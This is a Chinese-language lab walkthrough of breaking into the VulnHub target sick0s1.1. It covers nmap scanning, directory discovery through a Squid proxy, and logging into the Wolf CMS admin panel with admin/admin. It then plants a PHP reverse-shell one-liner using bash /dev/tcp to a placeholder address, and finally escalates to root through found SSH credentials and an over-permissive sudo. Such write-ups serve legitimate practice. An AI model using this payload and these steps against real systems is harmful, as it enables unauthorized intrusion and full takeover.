本文详细描述了对sick0s1.1靶机的入侵过程,包括环境搭建、信息收集、漏洞探测、web服务分析、目录扫描、弱口令登录、反弹shell、权限提升等环节,最终通过sudo配置不当实现root提权。
sick0s1.1靶机入侵
1、环境搭建
下载地址: https://download.vulnhub.com/sickos/sick0s1.1.7z
下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。
2、信息收集
-
主机发现
使用nmap进行主机探测(-sP参数也可):nmap -sn 192.168.110.1/24
192.168.110.131,为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.110.1/24
-
端口扫描
使用nmap扫描端口,并做服务识别和深度扫描(加-A参数):nmap -p- -A 192.168.110.131
靶机开启了22端口ssh服务和3128端口squid代理服务
3、漏洞探测
-
访问web服务
试着访问http://192.168.110.132/,发现无法访问。挂上3128的squid代理后成功访问
-
目录扫描
使用dirsearch扫描网站,并使用3128代理。
dirsearch -u http://192.168.110.132/ -e* -i 200 --proxy=http://192.168.110.132:3128在robots.txt发现/wolfcms 目录,网站应该是wolfcms搭建的
对/wolfcms进行目录扫描,没有什么有价值的发现。网站找了以下wolfcms的默认地址,成功访问后台管理登录页面
http://192.168.110.132/wolfcms/?/admin/login
-
登录后台
尝试使用弱口令登录,发现admin/admin成功登录。
-
getshell
登录后发现后台可以进行文件操作,创建一个php文件写入一句话木马,也可以直接写入反弹shell命令
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'"); ?>
木马所在的public录入前面扫描时已经扫到,所以木马位置为http://192.168.110.132/wolfcms/public/test.php,使用蚁剑连接,记得挂上靶机的3128代理
成功连接,反弹shell到本地
4、权限提升
-
sudo提权失败,需要密码
-
翻找文件
进入/home目录,找到一个用户sickos
找到mysql的用户密码
又找到一个尝试服务的提示
查看开放的端口,发现3306开启,但是发现mysql版本大于5.1,无法udf提权 -
ssh登录
利用找到的账号密码尝试登录ssh服务。sickos/john@123成功登录。
-
sudo 提权
发现sudo配置不当,权限过大。直接sudo su 提权到root
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
